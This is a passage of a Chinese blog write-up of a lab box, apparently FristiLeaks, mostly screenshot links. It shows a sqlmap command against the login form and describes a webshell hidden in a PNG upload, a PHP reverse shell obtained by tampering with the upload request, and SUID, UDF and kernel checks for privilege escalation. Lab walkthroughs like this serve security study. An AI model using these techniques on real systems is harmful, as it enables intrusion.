decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347439.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131194825619\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>base64\u89e3\u5bc6\u8f6c\u4e3a\u56fe\u7247<\/h3>\n<p>\u5999\u54c9\uff01\uff01\uff01\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\uff0c\u5931\u8d25\uff0c\u591a\u6b21\u5c1d\u8bd5\u90fd\u6ca1\u6210\u529f\uff0c\u5c1d\u8bd5\u4f7f\u7528 sqlmap \u8fdb\u884c\u626b\u63cf\uff0c\u672c\u6765\u60f3\u6253\u5f00\u6e90\u4ee3\u7801\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u6709\u4f20\u53c2\u65b9\u5f0f\u7684\uff0c\u7ed3\u679c\u53d1\u73b0\u4e86\u5acc\u7591\u5b57\u7b26\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347440.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347440.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131195139330\" \/><\/div><\/p>\n<p>\u4e5f\u53ef\u4ee5\u53d1\u73b0\u786e\u5b9e\u6709\u4f20\u53c2\u65b9\u5f0f\uff0c\u662f\u4f7f\u7528POST\u4f20\u53c2\u7684\uff0c\u6211\u4eec\u5148\u4f7f\u7528sqlmap\u67e5\u4e00\u4e0b\u662f\u5426\u6709\u6ce8\u5165\u70b9\uff1a<\/p>\n<pre><code class=\"language-shell\"># POST:myusername=adb&amp;mypassword=acd\nsqlmap -u http:\/\/192.168.244.145\/fristi --data &quot;myusername=adb&amp;mypassword=acd&quot; --method POST<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347441.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347441.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131200250447\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u7206\u7834\u5931\u8d25\u4e86\uff0c\u5c1d\u8bd5\u89e3\u5bc6\u4e00\u4e0b\u521a\u521a\u627e\u5230\u7684\u90a3\u4e2a<code>base64<\/code>\u5bc6\u6587\uff08\u731c\u6d4b\u662f\u7684\uff09\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347442.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347442.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131200823854\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u662f\u4e00\u4e2a\u7167\u7247\uff0c\u5185\u5bb9\u4e3a<code>keKkeKKeKKeKkEkkEk<\/code>\uff0c\u4e0a\u9762\u7684\u94fe\u63a5\u5176\u5b9e\u4e5f\u5f88\u53ef\u7591\uff0c\u4f46\u662f\u6211\u627e\u4e0d\u5230\u6709\u5565\u529e\u6cd5\uff0c\u4e0a\u9762\u8fd8\u6709\u4e2a\u63d0\u793a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347443.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347443.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131201052875\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5c06\u7528\u6237\u8bbe\u7f6e\u4e3a<code>eezeepz<\/code>\u770b\u770b\u80fd\u4e0d\u80fd\u8fdb\u5165\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347444.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347444.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131201247264\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u53e5\u8bdd\u56fe\u7247\u9a6c<\/h3>\n<p>\u6709\u4e00\u4e2a\u4e0a\u4f20\u6587\u4ef6\u7684\u9009\u9879\uff0c\u770b\u770b\u6e90\u7801\uff0c\u4f3c\u4e4e\u5c31\u662f\u4e2a\u4e0a\u4f20\u6587\u4ef6\u7684\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u53e5\u8bdd\u56fe\u7247\u9a6c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347445.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347445.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131202128953\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u66f4\u6539\u540e\u7f00\u540d\uff0c\u9690\u85cf\u4e3a png \u5c1d\u8bd5\u4e0a\u4f20\uff1a<\/p>\n<blockquote>\n<p>\u4e00\u53e5\u8bdd\u6728\u9a6c\u53ef\u4ee5\u9690\u85cf\u8fdbpng\u6587\u4ef6\uff0c\u8fd9\u4e3b\u8981\u662f\u5229\u7528\u4e86\u4e00\u79cd\u53eb\u505a\u9690\u5199\u672f\u7684\u6280\u672f\u3002\u9690\u5199\u672f\u662f\u4e00\u79cd\u53ef\u4ee5\u5728\u56fe\u50cf\u6216\u5176\u4ed6\u6587\u4ef6\u4e2d\u9690\u85cf\u6570\u636e\u7684\u6280\u672f\uff0c\u4f8b\u5982\u5728\u56fe\u50cf\u6587\u4ef6\u4e2d\u52a0\u5165\u9690\u85cf\u7684\u6807\u7b7e\u4fe1\u606f\u3002<\/p>\n<p>\u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u6076\u610f\u4ee3\u7801\uff08\u4f8b\u5982\u4e00\u53e5\u8bdd\u6728\u9a6c\uff09\u53ef\u4ee5\u88ab\u5d4c\u5165\u5230\u56fe\u50cf\u6587\u4ef6\uff08\u5982PNG\uff09\u4e2d\uff0c\u7136\u540e\u8fd9\u4e2a\u6587\u4ef6\u53ef\u4ee5\u88ab\u4e0a\u4f20\u5230\u670d\u52a1\u5668\u3002\u5982\u679c\u670d\u52a1\u5668\u914d\u7f6e\u4e86\u67d0\u4e9b\u89c4\u5219\uff08\u4f8b\u5982.htaccess\u7b49\uff09\uff0c\u53ef\u4ee5\u5c06\u8fd9\u4e2a\u56fe\u50cf\u6587\u4ef6\u89e3\u6790\u4e3aPHP\u6216\u8005ASP\u6587\u4ef6\uff0c\u4ece\u800c\u8fbe\u5230\u6267\u884c\u56fe\u7247\u5185\u4ee3\u7801\u7684\u76ee\u7684\u3002<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347446.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347446.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131202405192\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u83dc\u5200\u8fde\u63a5\uff1a\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347447.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347447.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131212446706\" \/><\/div><\/p>\n<p>\u53ef\u80fd\u662f\u88ab\u62e6\u622a\u4e86\uff1f\u5c1d\u8bd5\u4f7f\u7528php\u53cd\u5f39shell\uff0c\u7136\u540e\u901a\u8fc7\u6293\u5305\u6539\u5305\u8fdb\u884c\u4e0a\u4f20\uff1a<\/p>\n<h3>\u5c1d\u8bd5php\u53cd\u5f39shell<\/h3>\n<p>\u4f7f\u7528\u63d2\u4ef6\u751f\u6210\u4e00\u4e2ashell\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347448.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347448.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131212857463\" \/><\/div><\/p>\n<p>\u7136\u540e\u4e0a\u4f20\uff0c\u6293\u5305\u6539\u5305\uff0c\u8fd9\u91cc\u5df2\u7ecf\u67e5\u770b\u4e86\u4e0d\u662f\u524d\u7aef\u9a8c\u8bc1\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347450.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347450.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131213408499\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8bbf\u95ee\u4e00\u4e0b\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u770b\u5230\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347451.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347451.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131213755700\" \/><\/div><\/p>\n<p>\u6b63\u5e38\u53cd\u5f39\u4e86\u4e00\u4e2ashell\u4e0a\u53bb\u4e86\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u57fa\u7840\u6f0f\u6d1e\u6709\u6ca1\u6709\uff1a<\/p>\n<h3>\u5c1d\u8bd5SUID\u63d0\u6743<\/h3>\n<pre><code class=\"language-shell\">sh-4.1$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n# \/bin\/mount\n# \/bin\/fusermount\n# \/bin\/umount\n# \/bin\/su\n# \/bin\/ping\n# \/bin\/ping6\n# \/sbin\/pam_timestamp_check\n# \/sbin\/unix_chkpwd\n# \/usr\/bin\/crontab\n# \/usr\/bin\/chsh\n# \/usr\/bin\/sudo\n# \/usr\/bin\/chfn\n# \/usr\/bin\/newgrp\n# \/usr\/bin\/chage\n# \/usr\/bin\/gpasswd\n# \/usr\/bin\/passwd\n# \/usr\/libexec\/openssh\/ssh-keysign\n# \/usr\/libexec\/pt_chown\n# \/usr\/sbin\/suexec\n# \/usr\/sbin\/usernetctl<\/code><\/pre>\n<p>\u6ca1\u6709\u6211\u4eec\u60f3\u8981\u7684\u3002<\/p>\n<h3>\u5c1d\u8bd5UDF\u63d0\u6743<\/h3>\n<pre><code class=\"language-shell\">whereis lib_mysqludf_sys.so\n# whereis lib_mysqludf_sys.so\n# lib_mysqludf_sys:<\/code><\/pre>\n<p>\u6ca1\u6709\u76f8\u5e94\u5e93\u65e0\u6cd5\u63d0\u6743\u3002<\/p>\n<h3>\u67e5\u770b\u5185\u6838\u4fe1\u606f<\/h3>\n<pre><code class=\"language-shell\">sh-4.1$ uname -a\n# uname -a\n# Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU\/Linux<\/code><\/pre>\n<p>\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347452.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347452.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131214729975\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u8fd9\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347453.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347453.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131215048380\" \/><\/div><\/p>\n<p>\u770b\u6765\u5931\u8d25\u4e86\uff0c\u6362\u4e00\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347454.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347454.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131215428825\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347455.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347455.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131215639129\" \/><\/div><\/p>\n<p>\u770b\u6765\u4e5f\u5931\u8d25\u4e86\uff0c\u518d\u6362\u4e00\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347456.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347456.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131220026246\" \/><\/div><\/p>\n<p>\u4e5f\u4e0d\u884c\uff0c\u4f20\u4e00\u4e2a<code>linpeas.sh<\/code>\u4e0a\u53bb\uff0c\u770b\u770b\u6709\u6ca1\u6709\u53ef\u4ee5\u5229\u7528\u7684\u6f0f\u6d1e\uff0c\u8fd9\u8fb9\u5361\u4f4f\u4e86\uff0c\u6211\u6362\u4e86\u4e00\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347457.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347457.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131224407951\" \/><\/div><\/p>\n<p>\u4e0b\u8f7d\u4e0b\u6765\uff0c\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347458.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347458.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131224829825\" \/><\/div><\/p>\n<p>\u518d\u66f4\u6362\u4e00\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347459.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401312347459.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240131225054712\" style=\"zoom:50%;\" 